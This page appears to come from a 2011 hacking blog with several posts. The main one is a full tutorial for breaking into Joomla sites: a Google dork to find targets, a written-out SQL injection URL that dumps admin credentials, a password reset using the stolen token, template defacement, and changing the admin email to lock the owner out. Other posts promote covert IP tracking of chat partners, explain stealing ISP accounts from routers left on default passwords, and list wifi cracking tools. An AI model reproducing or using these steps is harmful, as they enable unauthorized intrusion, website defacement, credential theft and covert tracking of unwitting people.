Saturday, April 30, 2011

how to hack joomla(cms) website.. full tut..!!!!



Level: NFN (Not For Noobs)
Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7:http://filetram.com/download/file/4390169166/sqlihelper-2-rar
Joomla! Query Knowledge

DISCLAIMER:
THIS TUTORIAL IS FOR EDUCATION PURPOSE ONLY!!! YOU MAY NOT READ THIS TUTORIAL IF YOU DON'T UNDERSTAND AND AGREE TO THIS DISCLAIMER. ME AS AUTHOR OF THIS TUTORIAL NOT BE HELD RESPONSIBLE FOR THE MISUSE OF THE INFORMATION CONTAINED WITHIN THIS TUTORIAL. IF YOU ABUSE THIS TUTORIAL FOR ILLEGAL PURPOSES I WILL NOT BE HELD RESPONSIBLE FOR ANY ACTION THAT MAY BE TAKEN AGAINST YOU AS A RESULT OF YOUR MISUSE.

NOTE:
USE ANONYMOUS PROXY!!!

Introduction

Joomla! as Stable-Full Package is probably unhackable and If someone tells that HACKED Joomla, talking rubbish!!!
But people still hacked sites that use Joomla as Content Management System?!?
Joomla is made of components and modules and there are some developers apart from official team that offer their solutions to improve Joomla. That components and modules mede by that other developers are weak spots!

We hacked site that use Joomla! v1.5.6 and after that v1.5.9 through IDoBlog v1.1, but I can't tell that I hacked Joomla!

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit...

Google dork: inurl:"option=com_idoblog"
Comes up with results for about 140,000 pages

[Image: 001cv.png]

At inj3ct0r.com search for: com_idoblog
Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

[Image: 002rg.png]

==
Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln
==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,?11,12,13,14,15,16+from+jos_users--

Exploit can be separated in two parts:

Part I
index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
This part opening blog Admin page and if Admin page don't exist, exploit won't worked (not completely confirmed)

Part II
+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1?5,16+from+jos_users--
This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:
[Firefox]
Tools >> Options >> Content (tab menu) >> and unclick 'Load images automatically'

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22
Site load normally...

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
Site content blog Profile Admin

Go to:
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--
Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7
In Target copy
Code:
http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62
and click on Inject
Follow standard steps until you find Column Name, as a result we have

[Image: 003bd.png]

Notice that exploit from inj3ct0r wouldn't work here because it looking for jos_users table and as you can see
our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

[Image: 004k.png]

username: admin
email: info@site.com
password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a
32 character salt that is appended to the end of the password string. The password is stored as
{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time...

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:
Code:
http://www.site.com/index.php?option=com_user&view=reset
This is standard Joomla! query for password reset request

[Image: 005hy.png]

Forgot your Password? page will load.
In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.
If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

[Image: 006fj.png]

username: admin
activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

[Image: 007pa.png]

If you done everything ok, Rest your Password page will load. Enter your new password...

After that go to:
Code:
http://www.site.com/administrator/
Standard Joomla portal content management system

Enter username admin and your password, click on Login
Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML
In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

[Image: 008bo.png]

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

[Image: 009kw.png]
Free location tracking codes will trace location of your chat buddy with the help of  IP lookup. 


These Location tracking codes, which you present in chat room
land on page with good pictures. meanwhile, the other chat buddy's IP Address is stored in a database. IP Look Up identify
CountryNear city, Local time, etc..  of the other buddy.

 Get Your  chat Tracking codes.
 After Sign Up, you get a set of tracking codes,
Using which you can find Location details.. of  your chat friends.

How to Sign Up


The process of sign up involves entering
1. First name2. Last name3. User name4. Pass word
Sign Up takes less than 20 Seconds to complete.
 Log In to your member page, where you find, your own personalized "Location tracking codes" ready to use in any chat rooms.
Member page has mainly two pages
1. Several Tracking Codes (page)
2. Track results (page)

How to Find Location of your chat friend
Very first step is Sign Up. and Log in your member area.
Copy any one tracking code
Past that code in chat room text box
Ask your chat friend  to click and see the picture.
After few seconds click Track Result link and find chat friend's location details.
Sign Up NOW
NOW U GOT THE IP ADRESS IF U WONT FIND ANY MAP OR LOACATION THEN COPY THE IP ADRESS ND GOTO: www.ip-adress.com  
nd paste ur ip ther nd search u will find location too..:D:D:D:D..!!!

Monday, April 25, 2011

Hacking Routers - FREE ADSL..!!!




Hacking ADSL Routers for free accounts


Most of the people never change their default passwords no matter what it is, they don't change them because they think that they are safe. In this tutorial I'll show you one of the ways how to use this mistake and get free ADSL/Wireless (If wireless router is used) accounts and enjoy in unlimited downloads.

First we will download the necessary tools:

1.) XPass
2.) Angry IP Scanner v3.0.4 Beta
3.) If you don't have Java installed, download and install it here:JAVA

You will also need to have version 8 OR older of Internet Explorer.


Ok so let's start with getting the job done:

1.) Go to WhatIsMyIp
and check your IP address, let's say that your current (ADSL providers usually give you dynamic IP's) IP is 67.140.112.83, you will change the last two groups of numbers.

2.) Open Angry IP scanner it will look like this:

[Image: pic1hr.png]


Now where it says IP range in the first input field we'll enter our IP address 67.140.112.83 (but we'll change the last two-or three digits, in this case there are two to zero) so it will be like this: 67.140.112.0

And in the second input field we will enter the IP with changed last two groups of numbers so it actually has something to scan, we'll change it to:

67.140.150.254

And before we click scan we need to set some options so it only shows us alive hosts:

Click Tools and then click preferences:

[Image: pic2q.png]

Then under the under the ports tab under Port Selection type 80 'cos we will be interested in hosts with port 80 opened:

[Image: pic3hi.png]

And on the display tab choose "Hosts with open ports only":

[Image: pic4e.png]

Then click OK to save the preferences and click start:

[Image: pic5f.png]

After few seconds or minutes you should see your first IP addresses:

[Image: pic6c.png]

Now just select one of the IP addresses and open it with INTERNET EXPLORER!!!

It will ask you for a login credentials:

[Image: pic7kh.png]

Now here comes the mistake people often make, default username and password, in this case it was admin:admin but you can look for default router passwords and usernames, so when I logged in it looked like this:

[Image: pic8.png]

Now for most of the routers (atleast the ones I had exp. with) you can find username in plain text and password covered with *'s when setting up a new connection, so just look for something that says connection wizard or connection setup, and follow the steps till you find the username and password as mentioned.

So why did we use Internet Explorer for this??

Because XPass works only with IE, we couldn't figure the pass out if we used Firefox or Chrome or Opera.

And now when we have the page where username and pass. are just open XPass click on the X sign and drag it over the *'s and you will have this:

[Image: pic9v.png]

And password in this case is: 854179 


Continue doing this with different IP's that Angry IP Scanner detects till you have enough accounts to fulfill your download needs.

Hope you liked the tutorial. 


Dont forget to comment :))

How to use NetStumbler for Scanning Wireless Networks?
1. Download the NetStumbler and Install it.

2. Run the NetStumbler. Then it will automatically starts scanning the wireless Networks around you.

3. Once its completed, you will see the complete list of wireless networks around you as shown in thesnapshot below:

hacking wifi, hacking wireless,hacking wireless modem
List of Wireless Networks Scanned by NetStumbler
 There you will see different columns such as MAC, SSID, SPEED, VENDOR, TYPE and much more...

4. Now select anyone of the MAC address that you wish to hack and want to explore more about that. If you click on the MAC address of one of the discovered wireless networks under channels, you will see a graph that shows the wireless network�s signal strength. The more green and the less spaces are there,it indicates better is signal strength.

5. As you can see NetStumbler provides a lot more than just the name (SSID) of the wireless network. It provides the MAC address, Channel number,encryption type, and a bunch more. All of these come in use when we decides that we wants to get in the secured network by cracking the encryption. 

There are two most common types of Encryption Methods used by Wireless Networks:
a. WEP (Wired Equivalent Privacy) � WEP isn�t considered safe anymore. Many flaws have been discovered that allow hackers to crack a WEP key easily. I will explain how to hack the WEP in next tutorial so guys keep reading..
b. WAP (Wireless Application Protocol) � WAP is the currently the most secure and best option to secure your wireless network. It�s not as easily cracked as WEP because the only way to retrieve a WAP key is
to use a brute-force or dictionary attack. If your key is secure enough, a dictionary attack won�t work and it could take decades to crack it if you brute-force it. This is why most hackers don�t even bother. But I will explain you smarter ways to hack WAP keys also rather than these noobish methods. I will explain this in my next consecutive  tutorials. So guys keep visiting.

Thats all about scanning the wireless networks, if you want that i should explain the other tools then please post in comments. I can explain them in future on demand.
Now how can protect our wireless network from scanned by NetStumber.

How to Protect yourself from NetStumbler?
1. Don not broadcast your SSID.
2. Always try to use stronger passwords like atleast one digit, one special character, uppercase letters mixed with lowercase letters.
3. But second point doesn't matter much so try to use better encryption method i.e. WAP to password protect your wireless Network.

So guys that's all for today , I hope you all have liked it. So keep visiting to know more about hacking.

wifi scanning ND hacking tools.!!





hacking wifi, hacking wireless,hacking wireless modem

Topics that we cover in this tutorial:
1. Wifi or Wireless Scanning tools
2. Scanning the Wireless Networks or Wifi Networks.
3. WEP hacking and cracking tools
4. Cracking the WEP key of wifi or Wireless Networks
5. Wireless Sniffing Tools
6. Wireless Sniffing technique
7. Security Measures to protect yourself from these attacks.

Guys you must know everything that's why i am explaining each and everything in this tutorials related to wireless networks or wifi hacking. Its a complete wireless network hacking tutorial with allhacking tools and how to use them. Using these you will came to know how to hack wifi or wireless networks and note guys this tutorial is 110% working like other one's.
Note: This article is only for Educational Purposes so that you can understand the loopholes in wireless networks and fix them. Any misuse can result in disastrous consequences like cyber crime.

Don't worry everything is ethical till you misuses it. So always try to be ethical as far as possible. Lets start from the first topic...

1. WIRELESS SCANNING TOOLS
Scanning tools is needed to scan the wifi or wireless networks around you. First of all we need to scan all the wireless networks so that we can select the wireless network to hack. There are several wireless scanning tools but my favorite is NET STUMBLER. And for Mac operating systems is MacStumbler.
There are several Wireless scanning tools, a list of all wireless scanning tools is given below:
a. NetStumbler for Windows operating systems.
NetStumbler (also known as Network Stumbler) is a tool for Windows that facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It runs on Microsoft Windows 98 and above. A trimmed-down version called MiniStumbler is available for Windows CE.

NetStumbler is commonly used for:
  • Wardriving
  • Verifying network configurations
  • Finding locations with poor coverage in one�s WLAN
  • Detecting causes of wireless interference
  • Detecting unauthorized (�rogue�) access points
  • Aiming directional antennas for long-haul WLAN links


b. MacStumbler for Mac operating systems.
MacStumbler is a small utility to emulate the functionality of projects like netstumbler, bsd-airtools, and kismet. It's meant purely for educational or auditing purposes, although many people enjoy using these types of programs to check out how many WiFi (wireless) networks are in their area, usually known as "war driving".
MacStumbler only works with AirPort wireless cards, it does not (yet) work with any PCMCIA or USB wireless devices. 



c. Kismet for Windows and Linux.
Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic. Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.



d. Redfang 2.5
Redfang is an application that finds non-discoverable Bluetooth devices by brute-forcing the last six bytes of the device's Bluetooth address and doing a read_remote_name().
http://www.hacker-soft.net/Soft/Soft_4399.htm



e. THC-WarDrive
THC-WarDrive is a tool for mapping your city for wavelan networks with a GPS device while you are driving a car or walking through the streets. THC-WarDrive is effective and flexible, a "must-download" for all wavelan nerds.
  
f. PrismStumbler
Prismstumbler is software which finds 802.11 (WLAN) networks. It comes with an easy to use GTK2 frontend and is small enough to fit on a small portable system. It is designed to be a flexible tool to find as much information about wireless LANinstallations as possible. Because of its client-server architecture the scanner engine may be used for different frontends. 



g. Mognet
Mognet is a free, open source wireless ethernet sniffer/analyzer written in Java. It is licensed under the GNU General Public License. It was designed with handheld devices like the iPaq in mind, but will run just as well on a desktop or laptop to find wireless networks.



h. WaveStumbler
WaveStumbler is console based 802.11 network mapper for Linux. It reports the basic AP stuff like channel, WEP, ESSID, MAC etc. It has support for Hermes based cards (Compaq, Lucent/Agere, � ) It still in development but tends to be stable. It consist of a patch against the kernel driver, orinoco.c which makes it possible to send the scan command to the driver viathe /proc/hermes/ethX/cmds file. The answer is then sent back via a netlink socket. WaveStumbler listens to this socket and displays the output data on the console.



i. StumbVerter
StumbVerter is a standalone application which allows you to import Network Stumbler's summary files into Microsoft's MapPoint 2002 maps. The logged WAPs will be shown with small icons, their colour and shape relating to WEP mode and signal strength.



j. AP Scanner
Wireless Access Point Utilites for Unix - it's a set of utilites to configure and monitor Wireless Access Points under Unix using SNMP protocol. Utilites knownly compiles and run under Linux, FreeBSD, NetBSD and AIX.



k. SSID Sniff
SSIDsniff is a nifty tool to use when looking to discover access points and save captured traffic. Comes with a configure script and supports Cisco Aironet and random prism2 based cards.



l. Wavemon
Wavemon is a ncurses based application forwireless hardware. It`s running currently under Linux with cards witch supported by Jean Tourrilhes wireless extensions. You will find them in the Kernel 2.4. I used this tool a few times, it`s small, works, opensource and good.



m. Wireless Security Auditor
Wireless Security Auditor allows network administrators to verify how secure a company�s wireless network is by executing an audit of accessible wireless networks. Featuring patent-pending cost-efficient GPU acceleration technologies, Elcomsoft Wireless Security Auditor attempts to recover the original WPA/WPA2 -PSK text passwords in order to test how secure your wireless environment is.



n. AirTraf
AirTraf 1.0 is a wireless sniffer that can detect and determine exactly what is being transmitted over 802.11 wireless networks. This open-source program tracks and identifies legitimate and rogue access points, keeps performance statistics on a by-user and by-protocol basis, measures the signal strength of network components, and more.



o. AirMagnet
AirMagnet WiFi Analyzer is the industry "de-facto" tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. AirMagnet WiFi Analyzer helps IT staff quickly solve end user issues while automatically detecting network security threats and other wireless network vulnerabilities.